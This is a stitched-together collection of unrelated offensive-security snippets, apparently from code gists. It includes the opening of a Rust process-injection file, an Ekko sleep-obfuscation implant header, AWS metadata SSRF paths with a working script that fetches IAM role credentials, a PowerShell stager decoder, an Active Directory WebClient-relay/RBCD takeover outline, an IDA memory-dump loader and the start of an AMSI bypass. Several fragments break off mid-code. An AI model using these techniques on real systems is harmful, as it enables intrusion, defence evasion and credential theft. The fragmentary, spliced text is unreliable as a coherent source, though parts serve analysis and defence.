```rust
/*
 * Rust basic Process injection using OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread
 * API dynamic resolution and shellcode XOR encoded
 */
// Win32 types declared by hand so the crate does not need a bindings dependency.
// HANDLE and LPVOID are opaque pointers, so only the pointer width matters.
#[allow(non_camel_case_types)]
type HANDLE = *mut u64;
#[allow(non_camel_case_types)]
type LPVOID = *mut u64;
#[allow(non_camel_case_types)]
type DWORD = u32;
```
```c
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>

/* Ekko sleep obfuscation: the function lives in the named "text" section so the
 * implant can locate and encrypt its own image while it sleeps. */
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)
{
```
```csharp
using System;
using System.Collections.Generic;
using System.DirectoryServices.Protocols;
using System.Globalization;
using System.Linq;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Security.Policy;
using System.Security.Principal;
using System.Text;
```
```
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/meta-data/iam/security-credentials/               # lists the attached role name(s)
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]    # temporary AccessKeyId / SecretAccessKey / Token for that role
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
# Role credentials live under meta-data/, not user-data/. An instance that enforces IMDSv2 answers
# plain GETs with 401: first PUT /latest/api/token with an X-aws-ec2-metadata-token-ttl-seconds
# header, then send the returned token in X-aws-ec2-metadata-token on every GET.
```
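The IMDSv2 handshake that the list above glosses over, as an added example that is not part of the gist: it enumerates the attached roles, fetches each role's temporary credentials, and shows why a plain-GET SSRF fails against an instance that requires v2. The header names and paths are the documented ones; `FakeIMDS` and the credential values inside it are constructed for offline use and are not real AWS data.

```python
import json
import urllib.error
import urllib.request

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"
TOKEN_PATH = "/latest/api/token"


def http_transport(method, url, headers=None, timeout=2):
    """Real transport: one request to the metadata service -> (status, body)."""
    req = urllib.request.Request(url, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.getcode(), resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def get_token(transport=http_transport, base=IMDS, ttl=21600):
    """IMDSv2 handshake: a PUT carrying the TTL header returns a session token.
    Returns None if the PUT is refused so callers can fall back to v1 GETs."""
    status, body = transport("PUT", base + TOKEN_PATH,
                             {"X-aws-ec2-metadata-token-ttl-seconds": str(ttl)})
    return body.strip() if status == 200 else None


def imds_get(path, token=None, transport=http_transport, base=IMDS):
    """GET a metadata path, presenting the v2 token when one is available."""
    headers = {"X-aws-ec2-metadata-token": token} if token else {}
    status, body = transport("GET", base + path, headers)
    if status != 200:
        raise RuntimeError("%s: HTTP %d" % (path, status))
    return body


def role_credentials(transport=http_transport, base=IMDS):
    """List attached roles, then fetch each role's temporary credential set."""
    token = get_token(transport, base)
    roles = imds_get(CREDS_PATH, token, transport, base).split()
    return {r: json.loads(imds_get(CREDS_PATH + r, token, transport, base))
            for r in roles}


class FakeIMDS:
    """Constructed stand-in for the metadata service (not the real service),
    just enough to exercise the token handshake offline."""

    def __init__(self, require_token):
        self.require_token = require_token
        self.tokens = set()
        # Constructed, non-functional credential material.
        self.roles = {"example-ec2-role": {
            "Code": "Success", "Type": "AWS-HMAC",
            "AccessKeyId": "ASIAEXAMPLEEXAMPLE00",
            "SecretAccessKey": "constructed/secret/not/real",
            "Token": "constructed-session-token",
            "Expiration": "2030-01-01T00:00:00Z"}}

    def __call__(self, method, url, headers=None):
        headers = headers or {}
        path = url.split("169.254.169.254", 1)[1]
        if method == "PUT" and path == TOKEN_PATH:
            if "X-aws-ec2-metadata-token-ttl-seconds" not in headers:
                return 400, "missing ttl header"
            tok = "tok-%d" % len(self.tokens)
            self.tokens.add(tok)
            return 200, tok
        if method != "GET":
            return 405, ""
        if self.require_token and headers.get("X-aws-ec2-metadata-token") not in self.tokens:
            return 401, "Unauthorized"          # what an IMDSv2-only instance does to a bare GET
        if path == CREDS_PATH:
            return 200, "\n".join(self.roles)
        role = path[len(CREDS_PATH):] if path.startswith(CREDS_PATH) else None
        if role in self.roles:
            return 200, json.dumps(self.roles[role])
        return 404, "Not Found"


if __name__ == "__main__":
    v2_only = FakeIMDS(require_token=True)
    print(role_credentials(transport=v2_only))
    try:
        imds_get(CREDS_PATH, None, v2_only)    # a plain-GET SSRF against v2-only
    except RuntimeError as err:
        print("plain GET against IMDSv2-only host:", err)
```

On a real instance, drop the `transport=` argument and `role_credentials()` talks to 169.254.169.254 directly; the PUT-plus-header requirement is exactly what a GET-only SSRF primitive cannot satisfy, which is why IMDSv2 enforcement (and the hop limit) matters defensively.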
CyberChef recipe for unpacking a two-stage PowerShell stager (outer gzip+base64 blob, inner base64 blob XORed with a `-bxor` key):

```
Regular_expression('User defined','FromBase64String\\("([^"]+)',true,true,false,false,false,false,'List capture groups')
From_Base64('A-Za-z0-9+/=',true)
Gunzip()
Register('([\\s\\S]*)',true,false,false)
Regular_expression('User defined','FromBase64String\\(\'([^\']+)',true,true,false,false,false,false,'List capture groups')
Register('([\\s\\S]*)',true,false,false)
Find_/_Replace({'option':'Regex','string':'.+'},'$R0',true,false,true,true)
Regular_expression('User defined','-bxor (.+)',true,true,false,false,false,false,'List capture groups')
Register('([\\s\\S]*)',true,false,false)
Find_/_Replace({'option':'Regex','string':'.+'},'$R1',true,false,true,true)
```
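The same pipeline as a script, added here as an example and not taken from the gist: the two `FromBase64String` regexes are the recipe's, the key regex is narrowed to a decimal literal (an assumption; stagers that store the key as a variable or hex literal need a different match), and `build_sample()` constructs a stager in the expected layout around a made-up payload so the decoder can be run offline.

```python
import base64
import gzip
import re

# Constructed stand-in for the shellcode a real stager carries (not shellcode).
PAYLOAD = bytes(range(64)) + b"\x00\xff" * 8
XOR_KEY = 35


def build_sample(payload=PAYLOAD, key=XOR_KEY):
    """Construct a two-stage stager in the layout the recipe targets:
    stage 2 holds the XOR-encoded payload as single-quoted base64 plus a
    `-bxor N` loop; stage 1 wraps gzip(stage 2) in double-quoted base64."""
    encoded = bytes(b ^ key for b in payload)
    stage2 = (
        "[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
        "for ($x = 0; $x -lt $var_code.Count; $x++) { "
        "$var_code[$x] = $var_code[$x] -bxor %d }\n"
        % (base64.b64encode(encoded).decode(), key)
    )
    blob = base64.b64encode(gzip.compress(stage2.encode())).decode()
    return (
        "$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(\"%s\"));"
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream("
        "$s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" % blob
    )


STAGE1_B64 = re.compile(r'FromBase64String\("([^"]+)')   # recipe step 1
STAGE2_B64 = re.compile(r"FromBase64String\('([^']+)")   # recipe step 5
XOR_KEY_RE = re.compile(r"-bxor\s+(\d+)")                # recipe step 8, decimal only


def unpack_stage1(stage1):
    """base64 -> gunzip -> stage 2 script text (recipe steps 1-3)."""
    m = STAGE1_B64.search(stage1)
    if not m:
        raise ValueError("no double-quoted FromBase64String() call in stage 1")
    raw = base64.b64decode(m.group(1))
    if raw[:2] != b"\x1f\x8b":
        raise ValueError("decoded blob is not gzip (magic %r)" % raw[:2])
    return gzip.decompress(raw).decode("utf-8", "replace")


def unpack_stage2(stage2):
    """base64 -> XOR with the -bxor key -> payload bytes (the recipe's tail)."""
    m = STAGE2_B64.search(stage2)
    if not m:
        raise ValueError("no single-quoted FromBase64String() call in stage 2")
    k = XOR_KEY_RE.search(stage2)
    if not k:
        raise ValueError("no decimal -bxor key in stage 2")
    key = int(k.group(1))
    if not 0 <= key <= 255:
        raise ValueError("xor key out of byte range: %d" % key)
    return bytes(b ^ key for b in base64.b64decode(m.group(1)))


def deobfuscate(stage1):
    return unpack_stage2(unpack_stage1(stage1))


if __name__ == "__main__":
    out = deobfuscate(build_sample())
    print(len(out), "bytes, first 16:", out[:16].hex())
```

Run against a captured stager, feed the script text to `deobfuscate()` and write the returned bytes to disk for a disassembler; the gzip magic check catches the common case where the outer blob is not gzip at all (a Deflate-only or plain-base64 variant) before it produces garbage.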
In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if the Desktop Experience feature, which installs the WebClient service, is present) when their WebClient service is running. In short, this is accomplished by:
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_), by pointing the callback at a WebDAV-style UNC path (for example `\\attacker@80\share`) that the WebClient service resolves over HTTP. This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS to configure RBCD (writing the victim computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute to delegate to an account the attacker controls).
- RBCD takeover (S4U2Self/S4U2Proxy from that account to obtain a service ticket to the victim as a privileged user).
HTTP is the essential part: an SMB client negotiates NTLM signing, which breaks SMB-to-LDAP(S) relay, while the WebClient's HTTP authentication does not, so the relayed authentication is accepted.
The caveat is that the WebClient service does not start automatically at boot. However, if the WebClient service has already been triggered to start on a workstation (for example, via some SharePoint interaction), that system can be taken over remotely. In addition, there are several ways to coerce the WebClient service to start remotely, which I cover in a section below.
```python
import re, subprocess, idaapi, ida_segment, ida_kernwin

# To install this, simply put it in your ida_install/loaders folder and open
# a `/proc/<pid>/mem` file!
#
# You might need to set `echo 0 > /proc/sys/kernel/yama/ptrace_scope` if you
# want to be able to dump processes depending on your system configuration.

# Check if the file is supported by our loader
def accept_file(li, filename):
    # Claim only /proc/<pid>/mem paths; returning 0 lets IDA try its other loaders.
    if re.match(r"^/proc/\d+/mem$", filename):
        return "Linux /proc/<pid>/mem dump"
    return 0
```
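What a loader like this has to do before it can create segments, as an added example that is not the gist's code: parse `/proc/<pid>/maps`, keep the mappings that can actually be read through `/proc/<pid>/mem`, and copy them out. `SAMPLE_MAPS` is constructed (made-up addresses and inode) so the parser runs offline; `dump_segments()` touches the real procfs and needs the ptrace permission the comment above mentions.

```python
import os
import re
from collections import namedtuple

Segment = namedtuple("Segment", "start end perms offset dev inode path")

MAPS_LINE = re.compile(
    r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S{4})\s+([0-9a-f]+)\s+(\S+)\s+(\d+)\s*(.*)$")

# Constructed /proc/<pid>/maps content for the offline demo; the addresses and
# inode number are made up and do not come from a real process.
SAMPLE_MAPS = """\
55f1c3a00000-55f1c3a01000 r--p 00000000 08:01 1234567                    /usr/bin/sleep
55f1c3a01000-55f1c3a02000 r-xp 00001000 08:01 1234567                    /usr/bin/sleep
7ffd1c2e1000-7ffd1c302000 rw-p 00000000 00:00 0                          [stack]
7ffd1c3ae000-7ffd1c3b2000 r--p 00000000 00:00 0                          [vvar]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]
"""


def parse_maps(text):
    """One Segment per maps line; lines that do not match are skipped."""
    segs = []
    for line in text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        start, end, perms, off, dev, inode, path = m.groups()
        segs.append(Segment(int(start, 16), int(end, 16), perms,
                            int(off, 16), dev, int(inode), path.strip()))
    return segs


# [vvar] reads through /proc/<pid>/mem fail with EIO, and [vsyscall] is not
# readable and sits above the signed 64-bit file offset range anyway.
UNREADABLE = {"[vvar]", "[vsyscall]"}


def readable(segs):
    return [s for s in segs if s.perms[0] == "r" and s.path not in UNREADABLE]


def segment_class(seg):
    """Segment class the loader would hand to IDA: executable -> CODE."""
    return "CODE" if seg.perms[2] == "x" else "DATA"


def dump_segments(pid, out_dir):
    """Copy every readable mapping of `pid` to out_dir/<start>-<end>.bin.
    Requires ptrace permission over the target (see the ptrace_scope note)."""
    os.makedirs(out_dir, exist_ok=True)
    with open("/proc/%d/maps" % pid) as f:
        segs = readable(parse_maps(f.read()))
    written = []
    with open("/proc/%d/mem" % pid, "rb") as mem:
        for s in segs:
            try:
                mem.seek(s.start)
                data = mem.read(s.end - s.start)
            except OSError as err:          # mappings that vanished or cannot be read
                print("skip %x-%x %s: %s" % (s.start, s.end, s.path, err))
                continue
            name = os.path.join(out_dir, "%x-%x.bin" % (s.start, s.end))
            with open(name, "wb") as out:
                out.write(data)
            written.append(name)
    return written


if __name__ == "__main__":
    for s in readable(parse_maps(SAMPLE_MAPS)):
        print("%016x-%016x %s %s %s" % (s.start, s.end, s.perms, segment_class(s), s.path))
```

Inside IDA the same `parse_maps()` output would drive `ida_segment.add_segm()` calls (one per readable mapping, with `segment_class()` as the class) and `idaapi.mem2base()` to fill them from the dumped bytes.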
```powershell
function AmsiBypass
{
    # This is Rastamouse's in-memory patch method
    $ztzsw = @"
using System;
using System.Runtime.InteropServices;
public class ztzsw {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
```
```batch
::##########################################################################################################################
::
:: This script can ruin your day if you run it without fully understanding what it does, if you don't know what you are doing,
::
:: OR BOTH!!!
::
:: YOU HAVE BEEN WARNED!!!!!!!!!!
::
:: This script is provided "AS IS" with no warranties, and confers no rights.
:: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section,
```